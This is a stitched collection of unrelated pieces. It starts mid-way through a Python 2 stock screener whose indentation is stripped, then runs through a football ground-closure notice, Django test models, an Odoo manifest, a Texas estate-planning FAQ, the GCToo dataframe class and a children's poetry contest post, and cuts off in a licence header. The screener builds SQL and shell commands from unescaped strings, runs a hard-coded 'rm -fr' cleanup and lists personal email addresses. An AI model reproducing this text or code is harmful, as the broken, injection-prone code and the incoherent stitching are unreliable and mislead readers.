else:
print "Symbol = %s ,Not find trade data,please check" % symbol
return (False,False)
def sort_stock(stock_data):
""" Sort (symbol, change) tuples by change: descending for 'long', ascending
for 'short'.  Returns (ordered symbol list, ordered (symbol, change) list).

NOTE(review): depends on the module-global `action`; if it is neither
'long' nor 'short', `sorted_list` is never bound and a NameError follows.
"""
top_data = {}
s_data = {}
stock_list = []
pool_data = []
# Rank all tickers by their percent change (stored as string -> Decimal).
if action == "long":
sorted_list = sorted(stock_data, key=lambda result: Decimal(result[1]),reverse=True)
if action == "short":
sorted_list = sorted(stock_data, key=lambda result: Decimal(result[1]))
for item in sorted_list:
symbol = item[0]
stock_percent = item[1]
stock_list.append(symbol)
tmp_str = "%s,%s" % (symbol,stock_percent)
tmp_data = tuple(tmp_str.split(","))
pool_data.append(tmp_data)
return (stock_list,pool_data)
def get_indicator_output(symbol,dayago=65,sma=50,timeframe='day'):
"""
Run GeniusTrader's display_indicator.pl for the SMA of `symbol` and return
the percent change (Decimal, 3 dp) between the first and last SMA values in
the most recent `dayago` bars of the given timeframe.  Returns False when
the command fails, and 0 when the first SMA value is empty.
"""
symbol = symbol.upper()
##if DEBUG: print "DEBUG : CURRENT pROCESS SYMBOL=%s" % symbol
#print "DEBUG : CURRENT pROCESS SYMBOL=%s" % symbol
os.chdir('%s' % script_dir)
# The grep pattern differs per timeframe because the perl script prints
# dates as [Y-m-d], [Y-m] or [Y/m] depending on the timeframe.
if timeframe == 'day':
cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s|grep -P '\[\d+-\d+\-\d+]*.*'" % (timeframe,dayago,symbol,sma)
if timeframe == 'week':
cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s|grep -P '\[\d+-\d+]*.*'" % (timeframe,dayago,symbol,sma)
if timeframe == 'month':
cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s| grep -P '\[\d+\/\d+]*.*'" % (timeframe,dayago,symbol,sma)
#print "DEBUG indicator_cmd = %s" % cmd
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
return False
# Each output line looks like "[date] ... = value"; take first and last.
ind_list = output.split("\n")
base_point = ind_list[0].split("=")[1].strip()
if base_point !="":
last_point = ind_list[len(ind_list)-1].split("=")[1].strip()
change = (Decimal(last_point) - Decimal(base_point))/Decimal(base_point) * 100
change = Decimal(str(round(change, 3)))
else:
change = 0
return change
def scan_stock(conf_dir,stock_list,signal_file):
"""
"""
graph_dir = script_dir
ret_list = []
if len(stock_list) == 0 : return ret_list
timeframe="day"
if signal_file.find("week") != -1:
timeframe = "week"
elif signal_file.find("month") != -1:
timeframe = "month"
sig_file = "%s/%s" % (conf_dir,signal_file)
filename = "/dev/shm/%s" % (signal_file)
stock_FILE = open(filename,"w")
for symbol in stock_list:
stock_FILE.writelines(symbol+ "\n")
stock_FILE.close()
cmd = "cd %s;./scan.pl --nbprocess=4 --timeframe %s %s 'today' %s |sed -e '/^$/d' | sed -e '/Signal/d'" % (graph_dir,timeframe,filename,sig_file)
res = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
error_log = res.stderr.readlines()
if len(error_log) !=0:
print "CMD = %s" % cmd
print "DEBUG : stderr = %s " % res.stderr.readlines()
for line in res.stdout.readlines():
symbol = line.split('\t')[0]
ret_list.append(symbol.strip())
return ret_list
def create_stock_list(stock_list,stock_region='US'):
    """Dump the selected symbols, one per line, to the GeniusTrader scripts dir."""
    filename = "/home/hua.fu/geniustrader/Scripts/stock_%s_list" % (stock_region)
    out_file = open(filename,"w")
    for ticker in stock_list:
        out_file.write(ticker + "\n")
    out_file.close()
def filter_by_indicator(stock_list):
"""
Filter the symbol list through technical-indicator signal files: new highs
for a 'long' run, new lows for a 'short' run.  Relies on module globals
`action`, `conf_dir` and `DEBUG`.
"""
if action == "long":
filter_signal_file = ['buy_filter_new_high']
if action == "short":
filter_signal_file = ['sell_filter_new_low']
# Each pass narrows the surviving symbol list further.
for sig_file in filter_signal_file:
stock_list = scan_stock(conf_dir,stock_list,sig_file)
if DEBUG: print "DEBUG: After Scan = %s" % len(stock_list)
return stock_list
def update_filter_stockdb(stock_db,data,country):
"""
Persist qualifying symbols into the watch-pool database: insert new symbols
(firstsee = lastupdate = now) and refresh lastupdate_time for known ones.

NOTE(review): `new_list` collects the newly-inserted symbols but is never
returned or read -- confirm whether callers were meant to receive it.
"""
new_list = []
(pool_db_cursor,pool_cx) = connect_pool_db(stock_db)
pool_cx.text_factory=str
lastupdate_time = int(time.time())
for symbol in data:
try:
sql_cmd = 'insert into stock values(NULL,"%s","%s",%s,%s)' % (symbol,country,lastupdate_time,lastupdate_time)
pool_db_cursor.execute(sql_cmd)
new_list.append(symbol)
except sqlite.IntegrityError,e:
# UNIQUE(symbol) violation: the symbol is already pooled; touch it.
sql_cmd = "update stock set lastupdate_time = '%s' where symbol='%s'" % (lastupdate_time,symbol)
pool_db_cursor.execute(sql_cmd)
except Exception as inst:
print "exception type = %s,Error = %s" % (type(inst),inst)
pool_cx.commit()
def get_buy_point(stock_db,buy_signal,country):
"""
Scan the watch-pool database for `country` and return the symbols whose
daily chart currently triggers `buy_signal`.
"""
(db_cursor,pool_cx) = connect_pool_db(stock_db)
pool_cx.text_factory=str
# Fetch the pooled symbols for this market.
sql = "select symbol from stock where country='%s'" % (country)
db_cursor.execute(sql)
rs = db_cursor.fetchall()
if len(rs) == 0 : return
stock_list = []
for item in rs:
symbol = item[0]
stock_list.append(symbol)
pool_cx.close()
# Run the signal scan over the pooled symbols.
scan_list = scan_stock(conf_dir,stock_list,buy_signal)
if DEBUG: print "DEBUG: Buy Point Signal = %s ,After Scan = %s" % (buy_signal,len(scan_list))
return scan_list
def compare_to_spy(wating_stock_list,peroid_offet_list,country):
"""
Successively filter the candidate list down to symbols stronger than the
market index over each (day_ago, sma_day, timeframe) period.  The final
list is cached to a pickle file and reused while it is fresher than
86000 seconds (roughly one day).
"""
cache_file = "%s/tmp/filter_%s" % (base_dir,country)
if not os.path.isfile(cache_file) or (int(time.time()) - int(os.stat(cache_file).st_mtime) >= 86000):
for peroid in peroid_offet_list:
# calc_stock reads day_ago/sma_day from module globals, so each
# period is written into globals() before the pass runs.
(globals()['day_ago'],globals()['sma_day'],timeframe) = peroid
if DEBUG: print "DEBUG = Before filter count = %s" % len(wating_stock_list)
(long_stock_data,short_data) = calc_stock(wating_stock_list,country,timeframe)
(stock_list,pool_data) = sort_stock(long_stock_data)
if DEBUG: print "DEBUG = After filter count = %s" % len(stock_list)
wating_stock_list = stock_list
fout = open(cache_file, "w")
pickle.dump(stock_list, fout, protocol=0)
fout.close()
return stock_list
elif os.path.isfile(cache_file):
fin = open(cache_file, "r")
data = pickle.load(fin)
fin.close()
return data
def sendmail(msg):
""" Send `msg` as the daily stock report via the local SMTP server.
Failures are caught and printed rather than raised. """
SERVER = 'localhost'
FROM = 'hua.fu@alibaba-inc.com'
TO = ['hunterfu2009@gmail.com']
SUBJECT = 'Daily Stock Notify Report'
# Prepare actual message
message = """From: %s \nTo: %s\nSubject: %s \n
%s """ % (FROM, ", ".join(TO), SUBJECT, msg)
# Send the mail
try:
#server = smtplib.SMTP(host=SERVER,timeout=5)
server = smtplib.SMTP(host=SERVER)
server.sendmail(FROM, TO, message)
server.quit()
except Exception,e:
print 'Unable to send email ErrorMsg=%s' % e
def usage():
"""Print command-line help.

NOTE(review): the examples mention monitor_stock.py and flags (-l, -c) that
this script's getopt string ('dhs:r:e:') does not accept -- likely copied
from a sibling script; confirm and update the text.
"""
print '''
Usage: create_graph.py [options...]
Options:
-s/--action : long or short
-r/--region : the special region of stock [CHINA|US|HK|TRACK]
-e/--endday : scan stock endday [2011-10-1],default is today
-h/--help : this help info page
-d/--debug : run in debug mode
Example:
# default is checking all stock which in monitor db
monitor_stock.py
# debug special stock
monitor_stock.py -s ras
# setting stock support line and resistance_line
monitor_stock.py -s ras -l 2.44,2.48
# setting stock channel,maybe uptrend or downtrend
monitor_stock.py -s ras -c 2010-07-01,2010-07-02,2010-07-03
'''
def main():
""" Entry point: parse options, then for each selected market filter the
stock list by indicator signals and render charts for the survivors. """
# Local settings and state.
scan_signal_file = "signal_file"
stock_region =""
timeframe ="day"
endday = "today"
#global clientpool,action
global DEBUG
DEBUG = False
# Benchmark index per market: [display name, symbol].
global base_index
base_index = {}
base_index['CHINA'] = ["上证指数","000001.SS"]
base_index['US'] = ["标普500","^GSPC"]
global base_dir,action,img_out_dir,script_dir
base_dir = os.path.abspath(os.path.dirname(sys.argv[0]))
img_out_dir = "%s/img_out" % (base_dir)
script_dir = "%s/GeniusTrader/Scripts" % (base_dir)
stock_db = "%s/db/stock_db" % (base_dir)
# Watch-pool database.
stock_pool = "%s/db/stock_pool" % (base_dir)
# Screening periods: (day_ago, sma_day) consumed via globals by calc_stock.
global day_ago,sma_day,conf_dir
(day_ago,sma_day) = (30,200)
peroid_offet_list = [(30,200,'day'),(30,50,'day')]
conf_dir = "%s/conf" % (base_dir)
template_file = "%s/template/stock_template.html" % (base_dir)
db_cursor = None
cx = None
(db_cursor,cx) = connect_db(stock_db)
cx.text_factory=str
try:
opts, args = getopt.getopt(sys.argv[1:],'dhs:r:e:')
except getopt.GetoptError:
usage()
sys.exit()
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit()
elif opt == '-s':
scan_signal_file = arg
elif opt == '-e':
endday = arg
elif opt == '-d':
DEBUG = True
elif opt == '-r':
stock_region = arg
stock_region = stock_region.upper()
export_stock_symbol(db_cursor,cx)
if not scan_signal_file:
print "please setting long or short using -s"
sys.exit()
if scan_signal_file not in ['long','short']:
print "Input Action Not Correct,Please Check"
sys.exit()
action = scan_signal_file
region = []
if stock_region:
if stock_region not in ['CHINA','US','HK']:
print "Input Region Not Correct,Please Check"
sys.exit()
region.append(stock_region)
else:
region = ['CHINA','US','HK']
os.system("rm -fr /home/hua.fu/geniustrader/output/*")
for country in region:
#stock_list=['A','FSLR']
#create_graph(stock_list,template_file,conf_dir,country,"TESsig_file",endday)
#sys.exit(0)
# Filter out stocks stronger than the broad market index.
#wating_stock_list = get_stock_list(db_cursor,cx,country)
#stock_list = compare_to_spy(wating_stock_list,peroid_offet_list,country)
#stock_list = stock_list[:50]
#create_graph(stock_list,template_file,conf_dir,country,"all",endday)
#sys.exit(0)
# Filter by indicator signals (e.g. monthly KDJ bottom cross) and chart them.
wating_stock_list = get_stock_list(db_cursor,cx,country)
stock_list = wating_stock_list
data = filter_by_indicator(stock_list)
create_graph(data,template_file,conf_dir,country,"all",endday)
# NOTE(review): this sys.exit(0) stops after the FIRST region and makes
# the pool-update and buy-point code below unreachable -- confirm intent.
sys.exit(0)
# Save the survivors into the watch-pool database.
update_filter_stockdb(stock_pool,data,country)
# Rescan the daily charts of pooled stocks for buy points.
filter_signal_file = ['buy_point_signal_one','buy_point_signal_two','buy_point_signal_three']
for sig_file in filter_signal_file:
stock_list = get_buy_point(stock_pool,sig_file,country)
# Chart the matches.
if len(stock_list) > 0:
create_graph(stock_list,template_file,conf_dir,country,sig_file,endday)
#create_stock_list(stock_list,country)
#sys.exit(0)
if __name__ == "__main__":
main()
# Ad-hoc debugging snippets kept below for reference (all disabled).
#sys.exit(0)
#stocklist = ['A','BAC','FSLR']
#filter_list = scan_stock("/home/hua.fu/it-manager/stock_tech/conf",stocklist,"buy_signal_kdj_cross_month","US")
#print filter_list
#print get_indicator_output('000001.SS',30,30,'day')
#print get_indicator_output('^GSPC',30,30,'week')
#print get_indicator_output('^GSPC',30,30,'month')
#result_data = []
#stocklist = ['A','BAC','FSLR']
#t = ind_runs(-10,result_data,stocklist)
#t.start()
#threading.Thread.join(t)
#print result_data
|
12 June 2015, 6PM: Polwarth Dr 1 is CLOSED for all matches on Saturday 13th June 2015. All matches will be played on P2.
Rain does not automatically call off games, however the AMOUNT of rain does. In the event of wet weather you will receive an email advising if Polwarth Drive is open or closed. Coaches will also receive a text. Please check Facebook as well as website. For all other ground closures check North Coast Football.
Please check each Thursday morning for a report on ground conditions for Thursday training and Friday night for Saturday games.
Ground closures and other advice will be communicated on Facebook when known. Please join our Facebook site for your immediate updates.
Ground closures are based upon the condition of the field playing surfaces for games, and NOT whether it is raining or not.
Several days of rain can be more damaging (creating a soft surface) than a single heavy downpour (which mostly runs off).
The fact it is raining on Saturday morning may not close the grounds if it is light and has only just commenced.
Also note that we can only advise the closure of Polwarth Drive fields. If you are playing away, then you need to check the North Coast Football website for closures at other clubs.
|
from django.db import models
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
try: # new import added in Django 1.7
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.fields import GenericRelation
except ImportError:
from django.contrib.contenttypes import generic
GenericForeignKey = generic.GenericForeignKey
GenericRelation = generic.GenericRelation
import dumper
class LoggingModel(models.Model):
"""Model holding a single text field; its unicode form is the text itself."""
text = models.CharField(max_length=200)
def __unicode__(self):
return self.text
class SimpleModel(models.Model):
"""Model whose dependent paths are its own URL plus those of related models."""
slug = models.CharField(max_length=200, default='slug')
def get_absolute_url(self):
return reverse('simple-detail', kwargs={'slug': self.slug})
def dependent_paths(self):
"""Yield every URL path that depends on this instance."""
yield self.get_absolute_url()
# related_set is the reverse side of RelatedModel.related (many-to-many).
for model in self.related_set.all():
yield model.get_absolute_url()
class RelatedModel(models.Model):
"""Model with a many-to-many link to SimpleModel (reverse name: related_set)."""
slug = models.CharField(max_length=200, default='slug')
related = models.ManyToManyField(SimpleModel, related_name='related_set')
def dependent_paths(self):
# Only this model's own URL depends on it.
yield self.get_absolute_url()
def get_absolute_url(self):
return reverse('related-detail', kwargs={'slug': self.slug})
class GenericRelationModel(models.Model):
"""Model pointing at an arbitrary object through a generic foreign key."""
slug = models.CharField(max_length=200, default='slug')
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
def dependent_paths(self):
# The dependent URL is the *target* object's, not this model's own.
yield self.content_object.get_absolute_url()
class RelatedToGenericModel(models.Model):
"""Target model exposing the reverse side of GenericRelationModel's generic FK."""
slug = models.CharField(max_length=200, default='slug')
generic_related = GenericRelation(GenericRelationModel)
def get_absolute_url(self):
return reverse('related-to-generic-detail', kwargs={'slug': self.slug})
class GenericRelationNotRegisteredModel(models.Model):
"""Like GenericRelationModel, but not registered with dumper (see bottom of file)."""
slug = models.CharField(max_length=200, default='slug')
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
def dependent_paths(self):
# Returns None (not a generator), so there are no dependent paths;
# NOTE(review): callers must tolerate a non-iterable result.
pass
# Register these models with dumper; GenericRelationNotRegisteredModel is
# deliberately left unregistered (its name documents that).
dumper.register(SimpleModel)
dumper.register(RelatedModel)
dumper.register(GenericRelationModel)
|
Time to make a scene.
A BRAND NEW LEAFY STENCIL!
Build a fence, then climb over it.
I really must stop horsing around….
|
# -*- coding: utf8 -*-
#
# Copyright (C) 2014 NDP Systèmes (<http://www.ndp-systemes.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
#
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
{
# Odoo addon manifest: metadata read by the module loader.
'name': 'Stock Move Scheduling on Working Days',
'version': '0.1',
'author': 'NDP Systèmes',
'maintainer': 'NDP Systèmes',
'category': 'Warehouse',
# Needs resource calendars plus the procurement and stock engines.
'depends': ['resource','procurement','stock'],
'description': """
Stock Move Scheduling on Working Days
=====================================
This modules enables scheduling of procurements on working days defined by resources and associated calendars.
Each warehouse can have its own resource and associated calendar representing its opening days. If a warehouse is not
given a resource, then the system falls back to a company default calendar.
When a procurement needs to be scheduled by stock move, it counts only opened days defined by the
applicable calendar.
This module also enables that procurement rules of type "move" be triggered only on fixed days of the week. This is
particularly useful for scheduling chained moves where some activities are only performed on certain days (e.g.
transport between 2 warehouses only done twice a week on mondays and thursdays).
Notes:
------
- When no applicable calendar is found, the module's default calendar is used which sets working days from Monday to
Friday. This default calendar can be changed by authorized users.
- For a given procurement, the applicable warehouse is the warehouse of the location of the procurement. It falls back
on the warehouse of the procurement itself only if no location is defined. This is to handle correctly
inter-warehouse procurement with chained moves where the warehouse of the procurement is the warehouse of the end of
the chain.
""",
'website': 'http://www.ndp-systemes.fr',
# Data files loaded at install/update time (order matters).
'data': [
'security/ir.model.access.csv',
'stock_working_days_data.xml',
'stock_working_days_view.xml',
],
'demo': [
'stock_working_days_demo.xml',
],
'test': [],
'installable': True,
'auto_install': False,
'license': 'AGPL-3',
'application': False,
}
|
A: Many people believe that if there is no Will, all their assets will be distributed to their surviving spouse. If you do not create a valid Will, the state of Texas has a statute that will dictate where your assets go and who will administer your estate. If there are children from a previous marriage, they automatically become primary heirs, ahead of the surviving spouse. So, Texas law isn’t as simple as “community property”.
A: Probate is a court proceeding to transfer title from the decedent’s name to the living beneficiaries. Probate occurs in the state of your legal residence as well as any state where you own real property. The length of time to complete a Probate varies from state to state, but can take six to eighteen months, on average. Probate is frustrating to the heirs and is public record.
A: A Revocable Trust serves a number of purposes. One important purpose is that assets in the trust will not be subject to probate administration. This is accomplished by transferring your assets out of your name as individuals and placing them into a Trust, which you control. As a result, you have no assets in your estate therefore no need to have anything probated.
After your passing the Trust dictates the distribution of your assets, in a similar fashion to an old fashioned Will. However, with a Trust you can hold assets back to be distributed throughout a specific period of time. This prevents irresponsible heirs from receiving a lump sum windfall.
A: If you already have an estate plan, it should not be considered permanent. Conditions, as well as your desires, may change. Estate plans should be reviewed at least every two-three years but, additionally, any important change in your life demands immediate review.
A: Yes. If you do not have assets in your name or are proactive and plan while you still have capacity, you and your loved ones can avoid probate court. Contact our office for a complimentary evaluation of your assets.
A: Although your spouse is entitled to assets from your estate, if you have not planned correctly, your spouse will likely be subject to the probate court and its control.
A: The cost of an estate plan can vary depending on your situation and who you hire. Unless there is a dispute among the family members I can normally quote a set fee for all services, but I always suggest you come in for a complimentary consultation so we can discuss your specific situation.
A: This is probably my most commonly asked question. The real answer is that it depends specifically on your situation. Are you looking to completely avoid probate? Do you have multiple pieces of real estate in different counties or even a single piece of real estate in another state? Are your beneficiaries and/or executors living in another state? All of these questions help me to understand your situation to know whether you need one or the other.
|
"""
DATA:
-----------------------------
| | cid |
-----------------------------
| | |
|r | |
|i | data |
|d | |
| | |
-----------------------------
ROW METADATA:
--------------------------
|id| rhd |
--------------------------
| | |
|r | |
|i | row_metadata |
|d | |
| | |
--------------------------
COLUMN METADATA:
N.B. The df is transposed from how it looks in a gct file.
---------------------
|id| chd |
---------------------
| | |
| | |
| | |
|c | |
|i | col_metadata |
|d | |
| | |
| | |
| | |
---------------------
N.B. rids, cids, rhds, and chds must be:
- unique
- matching in both content & order everywhere they're found
"""
import numpy as np
import pandas as pd
import logging
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
__authors__ = 'Oana Enache, Lev Litichevskiy, Dave Lahr'
__email__ = 'dlahr@broadinstitute.org'
class GCToo(object):
    """Class representing parsed gct(x) objects as pandas dataframes.
    Contains 3 component dataframes (row_metadata_df, column_metadata_df,
    and data_df) as well as an assembly of these 3 into a multi index df
    that provides an alternate way of selecting data.
    """
    def __init__(self, data_df, row_metadata_df=None, col_metadata_df=None,
                 src=None, version=None, make_multiindex=False, logger_name=setup_logger.LOGGER_NAME):
        self.logger = logging.getLogger(logger_name)

        self.src = src
        self.version = version

        # Check data_df before setting
        self.check_df(data_df)
        self.data_df = data_df

        # Missing metadata is represented by an empty df sharing the
        # corresponding axis of data_df, so the id checks still hold.
        if row_metadata_df is None:
            self.row_metadata_df = pd.DataFrame(index=data_df.index)
        else:
            # Lots of checks will occur when this attribute is set (see __setattr__ below)
            self.row_metadata_df = row_metadata_df

        if col_metadata_df is None:
            self.col_metadata_df = pd.DataFrame(index=data_df.columns)
        else:
            # Lots of checks will occur when this attribute is set (see __setattr__ below)
            self.col_metadata_df = col_metadata_df

        # Create multi_index_df if explicitly requested
        if make_multiindex:
            self.assemble_multi_index_df()
        else:
            self.multi_index_df = None

        # This GCToo object is now initialized
        self._initialized = True

    def __setattr__(self, name, value):
        """Validate and align the component dfs on every (re)assignment.

        - row/col metadata: checked, id-matched against data_df, and
          reindexed to data_df's ordering before being stored.
        - data_df (after init): existing metadata is re-checked and
          reindexed against the new data_df.
        - multi_index_df: cannot be reassigned after initialization.
        """
        # Make sure row/col metadata agree with data_df before setting
        if name in ["row_metadata_df", "col_metadata_df"]:
            self.check_df(value)
            if name == "row_metadata_df":
                self.id_match_check(self.data_df, value, "row")
                value = value.reindex(self.data_df.index)
                super(GCToo, self).__setattr__(name, value)
            else:
                self.id_match_check(self.data_df, value, "col")
                value = value.reindex(self.data_df.columns)
                super(GCToo, self).__setattr__(name, value)

        # When reassigning data_df after initialization, reindex row/col metadata if necessary
        # N.B. Need to check if _initialized is present before checking if it's true, or code will break
        elif name == "data_df" and "_initialized" in self.__dict__ and self._initialized:
            self.id_match_check(value, self.row_metadata_df, "row")
            self.id_match_check(value, self.col_metadata_df, "col")
            super(GCToo, self).__setattr__("row_metadata_df", self.row_metadata_df.reindex(value.index))
            super(GCToo, self).__setattr__("col_metadata_df", self.col_metadata_df.reindex(value.columns))
            super(GCToo, self).__setattr__(name, value)

        # Can't reassign multi_index_df after initialization
        elif name == "multi_index_df" and "_initialized" in self.__dict__ and self._initialized:
            msg = ("Cannot reassign value of multi_index_df attribute; " +
                   "if you'd like a new multiindex df, please create a new GCToo instance" +
                   "with appropriate data_df, row_metadata_df, and col_metadata_df fields.")
            self.logger.error(msg)
            raise Exception("GCToo.__setattr__: " + msg)

        # Otherwise, use the normal __setattr__ method
        else:
            super(GCToo, self).__setattr__(name, value)

    def check_df(self, df):
        """
        Verifies that df is a pandas DataFrame instance and
        that its index and column values are unique.
        Raises (after logging) on any violation; returns True otherwise.
        """
        if isinstance(df, pd.DataFrame):
            if not df.index.is_unique:
                repeats = df.index[df.index.duplicated()].values
                msg = "Index values must be unique but aren't. The following entries appear more than once: {}".format(repeats)
                self.logger.error(msg)
                raise Exception("GCToo GCToo.check_df " + msg)
            if not df.columns.is_unique:
                repeats = df.columns[df.columns.duplicated()].values
                msg = "Columns values must be unique but aren't. The following entries appear more than once: {}".format(repeats)
                # FIX: log before raising, matching the duplicate-index branch
                # above (this error path previously raised without logging).
                self.logger.error(msg)
                raise Exception("GCToo GCToo.check_df " + msg)
            else:
                return True
        else:
            msg = "expected Pandas DataFrame, got something else: {} of type: {}".format(df, type(df))
            self.logger.error(msg)
            raise Exception("GCToo GCToo.check_df " + msg)

    def id_match_check(self, data_df, meta_df, dim):
        """
        Verifies that id values match between:
        - row case: index of data_df & index of row metadata
        - col case: columns of data_df & index of column metadata
        Order is NOT required to match (set comparison); reindexing in
        __setattr__ takes care of ordering afterwards.
        """
        if dim == "row":
            if len(data_df.index) == len(meta_df.index) and set(data_df.index) == set(meta_df.index):
                return True
            else:
                msg = ("The rids are inconsistent between data_df and row_metadata_df.\n" +
                       "data_df.index.values:\n{}\nrow_metadata_df.index.values:\n{}").format(data_df.index.values, meta_df.index.values)
                self.logger.error(msg)
                raise Exception("GCToo GCToo.id_match_check " + msg)
        elif dim == "col":
            if len(data_df.columns) == len(meta_df.index) and set(data_df.columns) == set(meta_df.index):
                return True
            else:
                msg = ("The cids are inconsistent between data_df and col_metadata_df.\n" +
                       "data_df.columns.values:\n{}\ncol_metadata_df.index.values:\n{}").format(data_df.columns.values, meta_df.index.values)
                self.logger.error(msg)
                raise Exception("GCToo GCToo.id_match_check " + msg)

    def __str__(self):
        """Prints a string representation of a GCToo object."""
        version = "{}\n".format(self.version)
        source = "src: {}\n".format(self.src)

        data = "data_df: [{} rows x {} columns]\n".format(
            self.data_df.shape[0], self.data_df.shape[1])

        row_meta = "row_metadata_df: [{} rows x {} columns]\n".format(
            self.row_metadata_df.shape[0], self.row_metadata_df.shape[1])

        col_meta = "col_metadata_df: [{} rows x {} columns]".format(
            self.col_metadata_df.shape[0], self.col_metadata_df.shape[1])

        full_string = (version + source + data + row_meta + col_meta)
        return full_string

    def assemble_multi_index_df(self):
        """Assembles three component dataframes into a multiindex dataframe.
        Sets the result to self.multi_index_df.

        IMPORTANT: Cross-section ("xs") is the best command for selecting
        data. Be sure to use the flag "drop_level=False" with this command,
        or else the dataframe that is returned will not have the same
        metadata as the input.

        N.B. "level" means metadata header.
        N.B. "axis=1" indicates column annotations.

        Examples:
            1) Select the probe with pr_lua_id="LUA-3404":
            lua3404_df = multi_index_df.xs("LUA-3404", level="pr_lua_id", drop_level=False)
            2) Select all DMSO samples:
            DMSO_df = multi_index_df.xs("DMSO", level="pert_iname", axis=1, drop_level=False)
        """
        # prepare row index: fold the rid into the metadata as an extra level
        self.logger.debug("Row metadata shape: {}".format(self.row_metadata_df.shape))
        self.logger.debug("Is empty? {}".format(self.row_metadata_df.empty))
        row_copy = pd.DataFrame(self.row_metadata_df.index) if self.row_metadata_df.empty else self.row_metadata_df.copy()
        row_copy["rid"] = row_copy.index
        row_index = pd.MultiIndex.from_arrays(row_copy.T.values, names=row_copy.columns)

        # prepare column index: same, with the cid
        self.logger.debug("Col metadata shape: {}".format(self.col_metadata_df.shape))
        col_copy = pd.DataFrame(self.col_metadata_df.index) if self.col_metadata_df.empty else self.col_metadata_df.copy()
        col_copy["cid"] = col_copy.index
        transposed_col_metadata = col_copy.T
        col_index = pd.MultiIndex.from_arrays(transposed_col_metadata.values, names=transposed_col_metadata.index)

        # Create multi index dataframe using the values of data_df and the indexes created above
        self.logger.debug("Data df shape: {}".format(self.data_df.shape))
        self.multi_index_df = pd.DataFrame(data=self.data_df.values, index=row_index, columns=col_index)
def multi_index_df_to_component_dfs(multi_index_df, rid="rid", cid="cid"):
    """ Convert a multi-index df into 3 component dfs. """
    # The id levels become the indexes of all three component dfs.
    rids = list(multi_index_df.index.get_level_values(rid))
    cids = list(multi_index_df.columns.get_level_values(cid))

    def _split_axis(axis_index, id_level):
        # A non-multiindex axis, or a single-level one (as can happen under
        # python3), carries no metadata beyond the ids themselves.
        if not isinstance(axis_index, pd.MultiIndex) or len(axis_index.names) <= 1:
            return [], []
        # Drop the id level: it does not belong in the metadata body.
        remaining = axis_index.droplevel(id_level)
        # The remaining level names become the metadata headers.
        headers = list(remaining.names)
        # Assemble the metadata body, one column per header.
        body = np.array([remaining.get_level_values(h).values for h in headers]).T
        return headers, body

    rhds, row_metadata = _split_axis(multi_index_df.index, rid)
    chds, col_metadata = _split_axis(multi_index_df.columns, cid)

    # Create component dfs
    row_metadata_df = pd.DataFrame.from_records(row_metadata, index=pd.Index(rids, name="rid"), columns=pd.Index(rhds, name="rhd"))
    col_metadata_df = pd.DataFrame.from_records(col_metadata, index=pd.Index(cids, name="cid"), columns=pd.Index(chds, name="chd"))
    data_df = pd.DataFrame(multi_index_df.values, index=pd.Index(rids, name="rid"), columns=pd.Index(cids, name="cid"))

    return data_df, row_metadata_df, col_metadata_df
|
2014 Children’s Poetry Celebration & Contest PLUS Cinquain Poems!!
April is National Poetry Month! In celebration we’ll be sharing about CINQUAIN POEMS today, but first we want to tell you about the awesome drawing and poetry contest created by Preschool Powol Packets!
During April, co-hosting blogs (like ours!) will post about poetry. Comment on these posts to be entered in a DRAWING for a POETRY PRIZE. An additional entry is available for following host blogs on Facebook (for instance, if you follow Brave Writer, comment here so the entry can be counted).
There’s also a cool Poetry Contest for kids! Children can enter one or two original poems (30 lines or shorter) in one of the following age categories: 4-6, 7-9, 10-12. Entries will be accepted any time during the month of April via a form at Preschool Powol Packets. Poems will be judged on creativity, originality, style, and language. Judging may be subjective and all decisions are final. This year’s contest will be judged by the lovely Becky at This Reading Mama. More info at Preschool Powol Packets.
taught by our very own Susanne Barrett.
A Cinquain is a five-lined poem (hence the name!) and is a favorite poetic form for many kids because, as one of our students pointed out, “they are easy and fun to write and they don’t require a whole lot of words!” They also reinforce some basic grammatical parts of speech.
Sometimes each line is centered to create a diamond or tree-like shape.
Students may capitalize all the words, none of the words, the first words of each line, or just certain words. And each poem may be capitalized differently, depending on its subject matter, diction (word choice), etc. Just see which way feels the best to you for each poem. Also, slight variations of syllables are okay.
If your kids write a Cinquain poem, they can submit it to the 2014 Children’s Poetry Celebration & Contest.
Prize details are at Preschool Powol Packets (Psst! Brave Writer has donated our Arrow Poetry Guide).
This entry is filed under Contests / Giveaways, Poetry. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
I follow BraveWriter on FB!
I think we’ll use the cinquain poetry format today as a way to review our language arts skills. I love writing cinquain poems. I can’t wait to see what topic my daughter chooses to write about today! Great post with example of how to differentiate for older learners.
I love how accessible you make cinquains! We’ll be writing some this afternoon! Thanks for a fabulous post!!
Did not know what a Cinquain poem was until today. Learn something everyday. It so happens we are doing the Arrow Poetry this month. Perfect timing.
What a great style for young kids! We just wrote haikus today, which also use syllables.
This is a great idea. I can’t wait to tell my kids about the poetry contest tomorrow at our poetry tea time. Thanks for sharing.
I’ve never heard of cinquain poems before. Maybe we’ll try them at our next poetry club. Thanks!
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
